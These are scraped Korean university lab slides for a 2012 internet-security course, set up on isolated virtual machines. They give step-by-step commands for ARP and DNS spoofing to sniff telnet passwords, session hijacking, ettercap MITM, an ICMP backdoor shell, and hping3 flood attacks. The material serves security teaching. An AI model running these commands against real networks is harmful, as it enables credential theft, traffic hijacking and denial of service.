Download
1 / 17
170 likes | 681 Views
인터넷보안 실습 . 2012 년 1 학기 . 환경설정 -1. 1. VMPlayer 4.0.3 설치 Vmware tool for Linux 설치하지 않도록 주의 2. Fedora 12 설치 3. gcc 설치 : yum install gcc 4. 프로그램 설치 소스설치 : fragrouter Yum 설치 : dsniff , hunt . tar zxvf fragrouter -….. cd fragrouter … ./configure make .
E N D
인터넷보안 실습 2012년 1학기
환경설정 -1 • 1. VMPlayer 4.0.3 설치 • Vmware tool for Linux 설치하지 않도록 주의 • 2. Fedora 12 설치 • 3. gcc설치:yum install gcc • 4. 프로그램 설치 • 소스설치 : fragrouter • Yum 설치: dsniff, hunt tarzxvffragrouter-….. cdfragrouter… ./configure make yum install dsniff yum install hunt
환경설정 -2 • 5. 컴퓨터를 3대로 복제 • 반드시 power off 후 복제 • 내문서에서 폴더복사 • 폴더이름 변경: server, client, attacker • Vmplayer에서 복사된 컴퓨터 열기 • 메모리 설정: 256MB • 컴퓨터이름 설정
실습 8-5. ARP스푸핑 텔넷 서버 라우터 192.168.18.2 클라이언트 192.168.18.129 61.81.109.10 외부 텔넷서버 접속 공격자에게 패스워드 탈취 공격자 192.168.18.128 Ifconfig eth0 promisc 터미널 1: ./fragrouter –B1 (패킷릴레이) 터미널 2: dsniff (텔넷 스니핑) 터미널 3: Arpspoof –I eth0 –t 192.168.18.129 192.168.18.2 (공격대상 IP) (라우터IP) 공격대상 클라이언트(129)에게 라우터(2)의 맥주소가 공격자컴퓨터(128)의 맥주소라고 허위 광고하는 ARP 메시지를 계속 보냄
실습 8-6. ICMP 리다이렉트 텔넷 서버 라우터 192.168.18.2 클라이언트 192.168.18.129 61.81.109.10 외부 텔넷서버 접속 공격자에게 패스워드 탈취 공격자 192.168.18.128 Ifconfig eth0 promisc 터미널 1: ./fragrouter –B1 (패킷릴레이) 터미널 2: dsniff (텔넷 스니핑) 터미널 3: icmp_redir.c컴파일 ./icmp_redir 192.168.18.2 192.168.18.129 외부서버IP 192.168.18.128 (게이트웨이) (공격대상IP) (외부서버IP) (공격자IP) 공격대상 클라이언트(129)에게 특정 외부서버에 접속시에는 공격자컴퓨터(128)가 라우터(2)라고 허위광고하는 ICMP redirect 메시지를 계속 보냄
실습 8-8. 스니퍼 찾아보기 • Hunt 설치 • Yum install hunt • Hunt 실행 • U) host up test • Start IP addr • End IP addr • Host up test (arp method) • Host up test (ping method) • Net ifcpromisc test (arp method) 임의의맥주소 입력 • Net ifcpromisc test (ping method) 임의의맥주소 입력
실습 9-2. Fake 이용한 스푸핑 텔넷서버 192.168.18.130 클라이언트 192.168.18.129 telnet-server 설치 /etc/xinet.d/telnet 설정 변경 Service xinetd start 방화벽 23번 포트 허용 텔넷서버 접속 공격자에게 패스워드 탈취 공격자 192.168.18.128 Fake 설치 : rpm –Uvh fake-…. (send_arp명령 가능) 공격자는 서버와 클라이언트에게 ping을 하고 arp –a로 맥주소 확인 공격자는 ifconfig로 자신의 맥주소 확인 터미널 1: ./fragrouter –B1 (패킷릴레이) 터미널 2: dsniff (텔넷 스니핑) 터미널 3: send_arp서버IP 공격자MAC 클라이언트IP 클라이언트MAC 공격자의 맥주소를 서버의 맥주소라고 허위 arp메시지를 보내서 클라이언트를속임
실습 9-3. DNS 스푸핑 웹서버 라우터 192.168.18.2 클라이언트 192.168.18.129 외부 웹서버 접속 시도 공격자가 위조된 IP주소 전달 위조된 사이트로 접속 공격자 192.168.18.128 Vi /etc/dsniff/dnsspoof.hosts 위조된 사이트 등록 (예: 61.81.105.13 *.naver.com ) 터미널 1: ./fragrouter –B1 (패킷릴레이) 터미널 2: arpspoof -t 192.168.18.129 192.168.18.2 (공격자시스템을 라우터라고 광고) 터미널 3: dnsspoof –i eth0 -f /etc/dsniff/dnsspoof.hosts (위조된 IP주소 전달)
실습 10-2. SSH 터널링 SSH클라이언트 윈도우 SSH 서버 페도라리눅스 Putty 설치 SSH 설치 Putty에서터널링 설정 - 포워드될 포트 추가 Putty로 SSH 접속 익스플로러에서 인터넷옵션 선택 - 인터넷옵션/연결/LAN설정/고급/프록시설정 익스플로러로 웹사이트 접속 Wireshark로 패킷 분석 - http 패킷이 사용되지 않고 ssh패킷으로터널링되어 웹사이트 접속됨
실습 10-3. 셸백도어 은닉채널 클라이언트 페도라리눅스 서버 페도라리눅스 Ish설치 서버에 접속 ./ish서버주소 Ish설치 데몬 실행 ./ishd Wireshark로 패킷분석 - ICMP 패킷을 이용하여 텔넷 이용 가능
실습 11-1. Hunt를이용한 세션하이재킹 텔넷서버 192.168.18.130 클라이언트 192.168.18.129 1) 미리 텔넷서버 접속. 로그인. 3) 공격자에게 세션 탈취당함 - 공격자는 로그인 없이 접속 - 클라이언트의 접속을 차단 공격자 192.168.18.128 2) Hunt 실행 d) daemons rst/arp/sniff/mac a) arp spoof + arprelayer daemon a) add host to host arp spoof 서버 IP 주소 등록 (임의 맥주소) 클라이언트 IP 주소 등록 (임의 맥주소) refresh 간격: 2 x x 최상위메뉴 l) list/watch/reset connections (세션탐지) a) arp/simple hijack (그림 11-11 참조) ctrl+c로 세션 하이재킹
실습 11-2. 웹 MITM 공격 외부 웹서버 클라이언트가 외부 웹서버를사용할때 내부웹서버를 일부참조하도록 변조 내부웹서버 192.168.18.130 공격자 192.168.18.128 클라이언트 192.168.18.129 (1) 내부웹서버 설정 yum install httpd service httpd start 방화벽에서 http 허용 그림파일을 /var/www/html/에 저장 (2) 공격자 설정 1. Ettercap설치 yum install ettercap 2. Etterfilter설정 vi filter.txt (그림 11-19) 3. Etterfilter컴파일 etterfilter –o filter.ef filter.txt 4. MITM 공격 수행 ettercap –T –q –F filter.ef –M ARP /192.168.18.129/ // 웹문서의 모든 그림을 내부웹서버에 있는 그림으로 대체 (3) 클라이언트의 웹서핑 웹문서의 그림이 모두 변조되어 출력
실습 13-1. Ping of Death 공격자 192.168.18.128 서버 192.168.18.130 Hping3 설치 yum install hping3 터미널: tcpdump –Xx System monitor / resource 동작 공격중 리소스의 변화를 관찰 Tcpdump의 움직임을 관찰 Ping of death 공격 실시 hping3 -- icmp --rand-source 192.168.18.130 –d 65000 --flood 호스트컴퓨터의 작업관리자/성능을 켜고 CPU및 메모리 사용량 관찰 호스트윈도우 Ping of death 공격 실시 ping –n100 –l 65000 192.168.18.130
실습 13-2. SYN Flooding 공격자 192.168.18.128 서버 192.168.18.130 Hping3 설치 yum install hping3 웹서버설치 yum install httpd 웹서버 시작 service httpd start 방화벽 http 허용 터미널1: tcpdump –Xx System monitor / resource 동작 공격중 리소스의 변화를 관찰 Tcpdump의 움직임을 관찰 터미널2: netstat –an | greptcp관찰 SYN Flooding 공격 실시 hping--rand-source 192.168.18.130 –p 80 –S --flood 호스트컴퓨터의 작업관리자/성능을 켜고 CPU및 메모리 사용량 관찰
실습 13-3. Bonk, Boink공격 공격자 192.168.18.128 서버 192.168.18.130 Hping3 설치 yum install hping3 터미널1: tcpdump –Xx System monitor / resource 동작 터미널 1 hping–a 200.200.200.200 192.168.18.130 --id 3200 --O 12345 -M 34343 -p 21 -d 320 --flood 공격중 리소스의 변화를 관찰 Tcpdump의 움직임을 관찰 터미널 2 hping–a 200.200.200.200 192.168.18.130 --id 3200 --O 12343 -M 34343 -p 21 -d 320 --flood 호스트컴퓨터의 작업관리자/성능을 켜고 CPU및 메모리 사용량 관찰
실습 13-4. Land 공격 공격자 192.168.18.128 서버 192.168.18.130 Hping3 설치 yum install hping3 터미널1: tcpdump –Xx System monitor / resource 동작 hping192.168.18.130 -a 192.168.18.130 --icmp --flood 목적지와 송신지 주소를 모두 서버의 주소로 입력 공격중 리소스의 변화를 관찰 Tcpdump의 움직임을 관찰 호스트컴퓨터의 작업관리자/성능을 켜고 CPU및 메모리 사용량 관찰
실습 13-5. Smurf 공격 공격자 192.168.18.128 서버 192.168.18.130 Hping3 설치 yum install hping3 터미널1: tcpdump –Xx System monitor / resource 동작 hping192.168.18.255-a 192.168.18.130 --icmp --flood 전체 네트워크에 공격대상시스템인 서버주소로 ping 응답을 보내도록 명령 공격중 리소스의 변화를 관찰 Tcpdump의 움직임을 관찰 호스트컴퓨터의 작업관리자/성능을 켜고 CPU및 메모리 사용량 관찰 hping10.24.0.255-a 192.168.18.130 --icmp --flood 전체 네트워크에 공격대상시스템인 서버주소로 ping 응답을 보내도록 명령
